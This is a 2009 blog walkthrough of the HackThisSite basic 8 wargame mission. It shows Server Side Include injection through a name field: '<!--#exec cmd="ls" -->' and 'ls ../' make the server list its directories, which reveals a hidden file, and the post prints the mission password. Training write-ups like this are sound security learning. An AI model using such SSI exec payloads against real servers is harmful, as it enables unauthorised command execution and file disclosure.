Axino.net

hackthissite.org basic 8 :: SSI

by Arxleol on Friday 03.07.2009, under hackthissite.org, tutorial

This mission will introduce some new concepts we haven’t come up until now. Though solution is fairly simple without clues you’ll probably need some time to figure it out and come up with idea to use SSI (server side includes).

Intro of mission pointed us to SSI:

The password is yet again hidden in an unknown file. Sam’s daughter has begun learning PHP, and has a small script to demonstrate her knowledge. Requirements: Knowledge of SSI (dynamic html executed by the server, rather than the browser)

Furthermore, when you open mission you see somewhat extensive story behind mission :D

Level 8

Sam remains confident that an obscured password file is still the best idea, but he screwed up with the calendar program. Sam has saved the unencrypted password file in /var/www/hackthissite.org/html/missions/basic/8/

However, Sam’s young daughter Stephanie has just learned to program in PHP. She’s talented for her age, but she knows nothing about security. She recently learned about saving files, and she wrote an script to demonstrate her ability.

So if you make additional reading either on wikipedia or on the sites they suggest you will probably know what to do. In addition if you have solved previous mission you have required knowledge to solve this. So let’s do it.

<!--#exec cmd="ls" -->

With following command you will be able to list all files in the directory Sam’s daughter saves file. When we execute this recieved result is:

Hi, tshngmww.shtml hipykpqu.shtml ztxdhjxn.shtml avpfeoie.shtml fviqpmaw.shtml kqbybdzc.shtml dzrnmzgx.shtml npcsygfl.shtml whqxxojt.shtml ylomcmvu.shtml uhdppswp.shtml gzntiicx.shtml dzwbqiuu.shtml qvzuieng.shtml smcerykh.shtml qjhnmhmq.shtml znodwztr.shtml!

Your name contains 254 characters.

Avoid going trough all these files just notice URL where file open. So what shell we do now? Simple, we need to obtain files from missions root directory. And as command ls accepts parameter for directory we will use following command. That returns us one level up in directory tree and therefore we are able to obtain list of files in missions’s root directory:

<!--#exec cmd="ls ../" -->

Result is here:

Hi, au12ha39vc.php index.php level8.php tmp!

Your name contains 39 characters.

Now its obvious that password is saved in: au12ha39vc.php

After opening this file we obtain password: cdea748e

Similar Posts:

:, , , , , ,
1 comment for this entry:
  1. hackthissite.org basic 9 :: - Axino.net
    Sunday 05.07.2009 on 06:17

    [...] 9 is very easy mission. Even basic introduction will suggest that we need to use SSI again as in previous mission. But what is more interesting and if you haven’t figured this, we will have to use previous [...]

Leave a Reply

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Visit other sites:

Archives